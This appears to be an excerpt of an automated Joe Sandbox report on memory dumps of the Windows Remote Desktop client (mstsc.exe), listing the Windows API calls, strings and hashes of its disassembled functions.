  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
• GetClientRect.USER32(?,?), ref: 00921C94
• CreateWindowExW.USER32 ref: 00921CBE
• SetWindowLongW.USER32(00000000,000000EB,?), ref: 00921CCF
• ShowWindow.USER32(?,00000001), ref: 00921D01
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ErrorLastWindow$AddressClassClientCreateCursorFreeHandleLibraryLoadLongMessageModuleObjectProcRectRegisterShowStockTrace
• String ID: 0$TscShellAxHostClass
• API String ID: 4201582936-2575422651
• Opcode ID: 7ad7b8c285021ee682aa4fb783048a3dd17ae00b260659119b74c22d3b2a6832
• Instruction ID: 39da45a6cb1b7a8afccd89504f115b05f53958d4e66b005bfc343e5cd7ca0070
• Opcode Fuzzy Hash: 7ad7b8c285021ee682aa4fb783048a3dd17ae00b260659119b74c22d3b2a6832
• Instruction Fuzzy Hash: 15514871914308AFCB24DFA5EC48FABBBB9EB89310F10445DF546AA2A1C7709854DF64
APIs
• LoadCursorW.USER32 ref: 0093A9E9
• RegisterClassExW.USER32(00000030), ref: 0093AA06
• GetLastError.KERNEL32 ref: 0093AA19
• GetLastError.KERNEL32 ref: 0093AA46
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
• CreateWindowExW.USER32 ref: 0093AA93
• SetLastError.KERNEL32(00000000), ref: 0093AAA2
• SetWindowLongW.USER32(?,000000EB,00000000), ref: 0093AAAE
• GetLastError.KERNEL32 ref: 0093AAB8
• GetLastError.KERNEL32 ref: 0093AAD6
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ErrorLast$Window$AddressClassCreateCursorFreeHandleLibraryLoadLongMessageModuleProcRegisterTrace
• String ID: 0$TscShellContainerClass
• API String ID: 661181555-978173974
• Opcode ID: 828e01c2d2841f48fb61ec83adeef7e32a409d41cdc686100b9310d02786d94b
• Instruction ID: d74872300528820204aec9ca275cad8e1ac32e8101d9ffbaad96948aa3dbd209
• Opcode Fuzzy Hash: 828e01c2d2841f48fb61ec83adeef7e32a409d41cdc686100b9310d02786d94b
• Instruction Fuzzy Hash: 51415DB1514304AEDB289F69DC59F6BBBBAEF48300F04415EF581E62A1D7B4D840DF62
Strings
• Kernel-MUI-Language-Disallowed, xrefs: 022C8914
• Kernel-MUI-Language-SKU, xrefs: 022C89FC
• WindowsExcludedProcs, xrefs: 022C87C1
• Kernel-MUI-Language-Allowed, xrefs: 022C8827
• Kernel-MUI-Number-Allowed, xrefs: 022C87E6
Memory Dump Source
• Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
• Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
Similarity
• API ID: _wcspbrk
• String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                    • API String ID: 402402107-258546922
                                                                                                                                                                                    • Opcode ID: b83fb37f0dd41d0099ab651f7649cde5560e98e4f1b22fc096c33f6fea6179c6
                                                                                                                                                                                    • Instruction ID: 965281fc7eea20ba31160d3429bb883e37528cf055e4fb7d8812b57fb13de0b4
                                                                                                                                                                                    • Opcode Fuzzy Hash: b83fb37f0dd41d0099ab651f7649cde5560e98e4f1b22fc096c33f6fea6179c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 09F1F5B2D10209EFCF11EFD4C9809EEB7B9BF08304F25856AE605A7614E7349A45DF61
APIs
• LoadLibraryExW.KERNEL32(?,00000000,?,?,0096AFA8,?), ref: 009679A5
• SearchPathW.KERNEL32 ref: 009679D8
• FindResourceExW.KERNEL32(00000000,MUI,00000001,00000000), ref: 00967A16
• GetUserDefaultUILanguage.KERNEL32 ref: 00967A31
• GetSystemDefaultUILanguage.KERNEL32(?,00000000,?,00000000,?,?), ref: 00967AFC
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: DefaultLanguage$FindLibraryLoadPathResourceSearchSystemUser
• String ID: %s\%s$MUI
• API String ID: 1597595625-2651373239
• Opcode ID: 84867f6a7dc06fed7a2d23f7d10e0301e553b15678363c97ebd7f0bf5764fbb9
• Instruction ID: 1c219d28fa92e42cd0578c4c6fbd6a805e214a90ab7936d321c72ebb45212f50
• Opcode Fuzzy Hash: 84867f6a7dc06fed7a2d23f7d10e0301e553b15678363c97ebd7f0bf5764fbb9
• Instruction Fuzzy Hash: 01B1BAB1A142699BCF319BA4CC54BFEF37D9FC4348F0445E5E945A7281DA708EC48BA1
APIs
• DefWindowProcW.USER32(?,?,00000081,?,?,?,00000000,00000000,?,0095D97E,00000081,?,?), ref: 0095DC34
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: Proc$AddressFreeHandleLibraryModuleWindow
• String ID: ForwardMessageToControl failed$OnActivateApp failed$OnCancel failed$OnClose failed$OnConnectFailed failed$OnEraseBkgnd failed$OnMouseActivate failed$OnPaint failed$OnSize failed$OnStartViewer failed
• API String ID: 2574719336-1852076887
• Opcode ID: 1dc7fc29eb00ed693b1c0c8c1a58736bad0381ff2746f5fec95e0eba647969d7
• Instruction ID: ed1a77239947d86c098a25c3c64b33539efcb67b3cda5f152059c4ab6e9e5e71
• Opcode Fuzzy Hash: 1dc7fc29eb00ed693b1c0c8c1a58736bad0381ff2746f5fec95e0eba647969d7
• Instruction Fuzzy Hash: D291B23160A3446EDB3BCF56CC59F313BAAAB46356F18444CFE40964E2C663CA49EF52
APIs
• memset.MSVCRT ref: 009608CE
• LocalFree.KERNEL32(?), ref: 00960A52
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00960A62
• ??3@YAXPAX@Z.MSVCRT(?), ref: 00960A68
• CredDeleteW.ADVAPI32(?,00000002,00000000), ref: 00960A7B
• SHStrDupW.SHLWAPI(?,?), ref: 00960ACC
• CredWriteW.ADVAPI32(?,00000000), ref: 00960B4C
• GetLastError.KERNEL32 ref: 00960B5A
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 00912C68: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000B,0091396B,00000004,00943BC2,00000004,00000000,?,00943BC2,0091396B,00000000,00000000,00000000), ref: 00912C85
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ??3@CredFree$AddressDeleteErrorHandleLastLibraryLocalMessageModuleProcTraceWritememset
• String ID: SHStrDup failed$s_DeleteCredHelper failed$s_UnpackAuthBlob failed
• API String ID: 641574173-1857523022
• Opcode ID: fc1735ef6d3852a421aeff0e8ccce4358911c968cd5301352562d622d3fd5b94
• Instruction ID: ca390657f631933b2e36e1c1ce5f74529a29017c618af66941cd8fadb1528819
• Opcode Fuzzy Hash: fc1735ef6d3852a421aeff0e8ccce4358911c968cd5301352562d622d3fd5b94
• Instruction Fuzzy Hash: 9891C372614344AFDB29CF94D889F6B3BAAABC9350F15408DF544AB2A2C774CC80EF51
APIs
• LoadLibraryW.KERNEL32(kernel32.dll,?,00000000,00000000), ref: 00965C9B
• GetLastError.KERNEL32 ref: 00965CC6
• GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 00965CF5
• GetProcAddress.KERNEL32(00000000,GetCurrentPackageFamilyName), ref: 00965D02
• GetLastError.KERNEL32 ref: 00965D2C
• GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 00965D4F
• ??2@YAPAXI@Z.MSVCRT ref: 00965E1F
• ??3@YAXPAX@Z.MSVCRT(00000000,0091396B,00000000,00000000), ref: 00965EEF
• FreeLibrary.KERNEL32(?), ref: 00965EF9
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ErrorLast$Library$??2@??3@AddressFreeLoadProc
• String ID: GetCurrentPackageFamilyName$kernel32.dll
• API String ID: 1625212921-3608959999
• Opcode ID: 21b4bd810e4d292ae23f155d3c2c41df2dbd78821d0e9922f2e92009bca37d71
• Instruction ID: 13632b0d140202362fe718cf25a27225c3bc130095ca8ce526c7d5fc5f5f3523
• Opcode Fuzzy Hash: 21b4bd810e4d292ae23f155d3c2c41df2dbd78821d0e9922f2e92009bca37d71
• Instruction Fuzzy Hash: 2F610671618740BFDB2A9F649859F273BAAAB49310F16004DF9419B1F2CB76CD80EF51
Memory Dump Source
• Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
• Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
Similarity
• API ID: _wcsnlen
• String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
• API String ID: 3628947076-1387797911
• Opcode ID: aa3c59e26c3dbef485daf6f820adf8b56029e89a39a9256331c27ddbf488ff7c
• Instruction ID: fcf667a3d80e6ab0c3c0636ca8d4eed618be8af316b5ec3e253065218b1998bd
• Opcode Fuzzy Hash: aa3c59e26c3dbef485daf6f820adf8b56029e89a39a9256331c27ddbf488ff7c
• Instruction Fuzzy Hash: 8F41A376240208BAFB239AE1CC41FEEB7ADAF04758F004122FB05D6190D7B4DB548BA4
APIs
• LoadLibraryW.KERNEL32(userenv.dll,?,00000000,00000000,0094C5A2), ref: 0094C1CD
• GetLastError.KERNEL32 ref: 0094C1FC
• GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 0094C228
• GetProcAddress.KERNEL32(00000000,GetAppContainerRegistryLocation), ref: 0094C244
• GetLastError.KERNEL32 ref: 0094C271
• GetLastError.KERNEL32(0091396B,00000000,00000000,00000000), ref: 0094C29D
• GetLastError.KERNEL32 ref: 0094C2BA
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 0090F9DC: TraceMessage.ADVAPI32(?,00000000,0000002B,00901728,00000010,00000000,00000004,?,00000005,00000000,00000001,00000000,00000000,?,0090FBF2,0091396B), ref: 0090FA1C
• FreeLibrary.KERNEL32(00000000), ref: 0094C310
Strings
Memory Dump Source
• Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
• Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
Similarity
• API ID: ErrorLast$Library$AddressFreeProc$HandleLoadMessageModuleTrace
• String ID: GetAppContainerRegistryLocation$phKey$userenv.dll
APIs
Strings
Similarity
• API ID: _wcsnicmp
• String ID: MRU0$MRU1$MRU2$MRU3$MRU4$MRU5$MRU6$MRU7$MRU8$MRU9
APIs
• IsDlgButtonChecked.USER32(?,000033B8), ref: 0093F889
• IsDlgButtonChecked.USER32(?,000033B9), ref: 0093F89A
• IsDlgButtonChecked.USER32(?,000033BA), ref: 0093F8A8
• IsDlgButtonChecked.USER32(?,000033BD), ref: 0093F8F4
• EndDialog.USER32 ref: 0093F90D
• EndDialog.USER32 ref: 0093F98E
Similarity
• API ID: ButtonChecked$Dialog
• String ID:
APIs
• ShowWindow.USER32(?,00000000), ref: 00962458
• ShowWindow.USER32(?,00000000), ref: 0096245F
• ShowWindow.USER32(?,00000000), ref: 00962474
• ShowWindow.USER32(?,00000005), ref: 0096248D
• ShowWindow.USER32(?,00000000), ref: 00962498
• ShowWindow.USER32(?,00000000), ref: 009624A6
• ShowWindow.USER32(?,00000005), ref: 009624D7
• ShowWindow.USER32(?,00000005), ref: 009624E0
• EnableWindow.USER32(?,00000000), ref: 009624E7
• ShowWindow.USER32(?,00000005), ref: 0096250D
• EnableWindow.USER32(?,00000001), ref: 00962514
• ShowWindow.USER32(?,00000000), ref: 00962527
Similarity
• API ID: Window$Show$Enable
• String ID:
Strings
• StringCchCopy failed, xrefs: 00930473
• IMsRdpClient5::get_DeviceCollection failed!, xrefs: 009303CE
• ;, xrefs: 009302F8
• QI for IMsRdpClientNonScriptable3 failed!, xrefs: 00930366
• IMsRdpDeviceCollection::get_DeviceByIndex failed!, xrefs: 009306F9, 00930758
• DynamicDevices, xrefs: 00930568
• IMsRdpDeviceCollection::GetDeviceCount failed, xrefs: 0093041D
Similarity
• API ID:
• String ID: ;$DynamicDevices$IMsRdpClient5::get_DeviceCollection failed!$IMsRdpDeviceCollection::GetDeviceCount failed$IMsRdpDeviceCollection::get_DeviceByIndex failed!$QI for IMsRdpClientNonScriptable3 failed!$StringCchCopy failed
APIs
• memset.MSVCRT ref: 0096132F
• memset.MSVCRT ref: 00961349
• memset.MSVCRT ref: 00961364
• LoadLibraryW.KERNEL32(?,00901B90,?,00000208,00000002,?,?,?,?,?,?,?,00000000,00000000), ref: 00961436
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,00000000,cookie=), ref: 0096153E
• GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 00961560
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
Strings
• cookie=, xrefs: 009614ED
• Failed to get the clx cookie, xrefs: 00961399
• No TEST DLL to load, so terminating CLX object, xrefs: 00961415
• Init() Error loading CLx DLL., xrefs: 00961475
Similarity
• API ID: memset$Library$AddressByteCharErrorFreeHandleLastLoadModuleMultiProcWide
• String ID: Failed to get the clx cookie$Init() Error loading CLx DLL.$No TEST DLL to load, so terminating CLX object$cookie=
APIs
• CredFree.ADVAPI32(00000000,?,00000000,00000000), ref: 00948491
• LocalFree.KERNEL32(00000000,?,00000000,00000000), ref: 0094849C
• CredReadDomainCredentialsW.ADVAPI32(?,00000000,?,?), ref: 00948515
• GetLastError.KERNEL32(?,00000000,00000000), ref: 0094851F
• _wcsicmp.MSVCRT ref: 009485D5
• LocalAlloc.KERNEL32(00000040,?,?,00000000,00000000), ref: 0094861E
  • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
  • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
  • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
  • Part of subcall function 0091D606: TraceMessage.ADVAPI32(00000000,00000000,0000002B,00907B50,0000000A,0091396B,00000004,NULL,0000000A,00000000,?,00000000,00000000,0000000A,?,00943B87), ref: 0091D673
Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Free$CredLocal$AddressAllocCredentialsDomainErrorHandleLastLibraryMessageModuleProcReadTrace_wcsicmp
                                                                                                                                                                                    • String ID: CredReadDomainCredentials$StringCbCopy$StringCchCopy$allocate memory for userName
                                                                                                                                                                                    • API String ID: 2989600279-4106186159
                                                                                                                                                                                    • Opcode ID: 89348b25dab3d1e58bd121d4a939cb424724a8e3e5eedfc4b3798fc26fd7c8d2
                                                                                                                                                                                    • Instruction ID: 368b340d335deb3a83bf0af297d28c90a658e14b58284fe2b4f49bbb9dc774b2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 89348b25dab3d1e58bd121d4a939cb424724a8e3e5eedfc4b3798fc26fd7c8d2
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1091B132A04329AFCB65DF58DC88FAA7BE9AB49304F0600D9E504A7272DB70DD81DF45
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                                                    • Opcode ID: 0caae6b5e39e747af2a03300f6b597c3e048971c8179430d62ca6cac344ffded
                                                                                                                                                                                    • Instruction ID: 7e30cd555751e29ce7d25cd4102aa4ca28448790bcd1ddb8ed25e0c65ec91259
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0caae6b5e39e747af2a03300f6b597c3e048971c8179430d62ca6cac344ffded
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B614971E20656A6DF34DFD9C8909BEBBB6EF84300794C43DE49B47648D334AA90DB60
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928676089.0000000002290000.00000040.00001000.00020000.00000000.sdmp, Offset: 02280000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002280000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002370000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002380000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002384000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002387000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.0000000002390000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                     • Associated: 0000000A.00000002.928676089.00000000023F0000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_2280000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ___swprintf_l
                                                                                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                                                                                    • Opcode ID: b5f195e42624118577244cff84e9454579a782f77a231e293107eb7dac5e1464
                                                                                                                                                                                    • Instruction ID: 8af95536f04961662db63913a0b069946fa9c91663f7d73577a1db5ebca40ac7
                                                                                                                                                                                    • Opcode Fuzzy Hash: b5f195e42624118577244cff84e9454579a782f77a231e293107eb7dac5e1464
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2061A3B2900645ABDB20DF99C84097E7BF6EF58310B24C5EAF8A987504E734EB80CB51
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetLastError.KERNEL32(?,0091EFB6,00000000), ref: 0091EAFB
                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,?,?,0091EFB6,00000000), ref: 0091EB46
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000338B), ref: 0091EB5A
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0091EB64
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0091EB76
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0091EB88
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0091EB91
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0091EB98
                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000104,?,?,0091EFB6,00000000), ref: 0091EBF9
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?,?,00000104,?,00000104,?,?,0091EFB6,00000000), ref: 0091ECA8
                                                                                                                                                                                      • Part of subcall function 00911040: GetModuleHandleExA.KERNEL32(00000000,Advapi32.dll,?,?), ref: 0091106D
                                                                                                                                                                                      • Part of subcall function 00911040: GetProcAddress.KERNEL32(?,EventActivityIdControl), ref: 0091107F
                                                                                                                                                                                      • Part of subcall function 00911040: FreeLibrary.KERNEL32(?), ref: 00911094
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                     • Associated: 0000000A.00000002.928543048.000000000096C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_900000_mstsc.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$ErrorItemLastLong$AddressFreeHandleLibraryModuleProcText
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2044706978-0
                                                                                                                                                                                    • Opcode ID: 2b3e7b6dc1c145a3cdef24ab4d63594aa4d4f0e5bb6d5d8d2d5bd7963afab3da
                                                                                                                                                                                    • Instruction ID: 6d8d160389fa34e38928c50297727804a244ba8f7ca5fe7c3aca4356aee1bd92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b3e7b6dc1c145a3cdef24ab4d63594aa4d4f0e5bb6d5d8d2d5bd7963afab3da
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B51B472A04308AFCB15DF68CD89EAA7FB9EB89310B150159FD41AB266C670DC80DF91
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 009392F3: memset.MSVCRT ref: 00939323
                                                                                                                                                                                      • Part of subcall function 009392F3: SendMessageW.USER32(?,00000440,0000139A,00000020), ref: 009393AE
                                                                                                                                                                                      • Part of subcall function 009393CA: GetWindowLongW.USER32(?,000000EC), ref: 009393F2
                                                                                                                                                                                      • Part of subcall function 009393CA: GetDlgItem.USER32(?,00001396), ref: 00939408
                                                                                                                                                                                      • Part of subcall function 009393CA: GetWindowRect.USER32(00000000,?), ref: 00939413
                                                                                                                                                                                      • Part of subcall function 009393CA: ScreenToClient.USER32(?,?), ref: 0093946F
                                                                                                                                                                                      • Part of subcall function 009393CA: SendMessageW.USER32(00000000,0000041F,00000000), ref: 009394A2
                                                                                                                                                                                      • Part of subcall function 009393CA: SetWindowPos.USER32(00000000,00000000,?,00939ADF,?,?,00000004), ref: 009394CE
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00939B2F
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00001394,?,00000000,?,00000110,?,?,?,0093927F,?,?,?), ref: 00939B5A
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00939B99
                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 00939B9C
                                                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00939BEB
                                                                                                                                                                                    • GetDlgItem.USER32(?,00001394), ref: 00939BF9
                                                                                                                                                                                    • SetFocus.USER32 ref: 00939BFC
                                                                                                                                                                                    • SetFocus.USER32 ref: 00939C0A
                                                                                                                                                                                    • SendMessageW.USER32(?,00000127,00010002,00000000), ref: 00939C21
                                                                                                                                                                                    • GetDlgItem.USER32(?,00001396), ref: 00939C2F
                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?,?,0093927F,?,?,?), ref: 00939C43
                                                                                                                                                                                      • Part of subcall function 00939A59: GetDlgItemTextW.USER32(?,00001394,?,00000100,00000001,?), ref: 00939A87
                                                                                                                                                                                      • Part of subcall function 009511F8: GetDlgItem.USER32(?,?), ref: 00951217
                                                                                                                                                                                      • Part of subcall function 009511F8: EnableWindow.USER32(00000000,0093927F), ref: 00951225
                                                                                                                                                                                      • Part of subcall function 0095123D: GetDlgItem.USER32(?,?), ref: 0095125C
                                                                                                                                                                                      • Part of subcall function 0095123D: ShowWindow.USER32(00000000,0093927F), ref: 00951272
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000A.00000002.928543048.0000000000900000.00000040.80000000.00040000.00000000.sdmp, Offset: 00900000, based on PE: true
